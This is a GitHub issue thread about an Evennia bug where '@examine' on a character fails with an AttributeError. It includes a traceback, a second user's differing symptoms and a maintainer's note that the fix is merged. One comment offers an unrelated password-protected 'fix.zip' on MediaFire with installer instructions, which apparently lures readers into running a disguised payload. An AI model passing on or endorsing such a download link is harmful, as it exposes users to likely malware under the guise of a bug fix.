### ISSUE TITLE
[BUG] Using `@examine` on a character breaks the active session

### ISSUE THREAD

**Issue by InspectorCaracal** [evennia/evennia#3602]
#### Describe the bug
When examining a character that has been active in the current server lifetime, the command will traceback in the logs and freeze the entire session with no error feedback or ability to do anything else. Disconnecting and reconnecting to force a new session will resolve the issue. Reloading the server to provide a new server-side session will also resolve the issue.

#### To Reproduce
1. Create a fresh game.
2. Do literally any command.
3. `ex me`

#### Environment, Evennia version, OS etc
Python 3.11, Debian, evennia main 11f0e8b01a

#### Additional context
Full traceback:
```
        Traceback (most recent call last):
          File "./evennia/evennia/commands/cmdhandler.py", line 629, in _run_command
            ret = cmd.func()
          File "./evennia/evennia/commands/default/building.py", line 3172, in func
            ).addCallback(_get_cmdset_callback)
          File "./devenv/lib/python3.11/site-packages/twisted/internet/defer.py", line 620, in addCallback
            return self.addCallbacks(callback, callbackArgs=args, callbackKeywords=kwargs)
          File "./devenv/lib/python3.11/site-packages/twisted/internet/defer.py", line 533, in addCallbacks
            self._runCallbacks()
        --- <exception caught here> ---
          File "./devenv/lib/python3.11/site-packages/twisted/internet/defer.py", line 1075, in _runCallbacks
            current.result = callback(  # type: ignore[misc]
          File "./evennia/evennia/commands/default/building.py", line 3160, in _get_cmdset_callback
            self.msg(self.format_output(obj, current_cmdset).strip())
          File "./evennia/evennia/commands/default/building.py", line 3005, in format_output
            objdata = self.get_formatted_obj_data(obj, current_cmdset)
          File "./evennia/evennia/commands/default/building.py", line 2989, in get_formatted_obj_data
            objdata["Non-Persistent Attributes"] = self.format_nattributes(obj)
          File "./evennia/evennia/commands/default/building.py", line 2882, in format_nattributes
            sorted(self.format_single_attribute(attr) for attr in ndb_attr)
          File "./evennia/evennia/commands/default/building.py", line 2882, in <genexpr>
            sorted(self.format_single_attribute(attr) for attr in ndb_attr)
          File "./evennia/evennia/commands/default/building.py", line 2853, in format_single_attribute
            if value is None and attr.strvalue is not None:
          File "./evennia/evennia/typeclasses/attributes.py", line 65, in <lambda>
            strvalue = property(lambda self: self.db_strvalue)
        builtins.AttributeError: 'InMemoryAttribute' object has no attribute 'db_strvalue'
```

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Darren791** [comment]
I actually came here to report this same problem, only my symptoms are a bit different. On a fresh DB, I can examine my character once and it works as expected. Subsequent uses of the "examine me" command produce no output and trigger the aforementioned error message in the log. There is no "freezing", the rest of the game continues to work fine, as does examining non-character objects. Shutting down and restarting the server does not fix the problem.

Python 3.11, FreeBSD 14.1, evennia main.

**Comment by 0xDEADFED5** [comment]
I was just checking to see if anyone else had reported this.

**Comment by Griatch** [comment]
Merged and fixed.
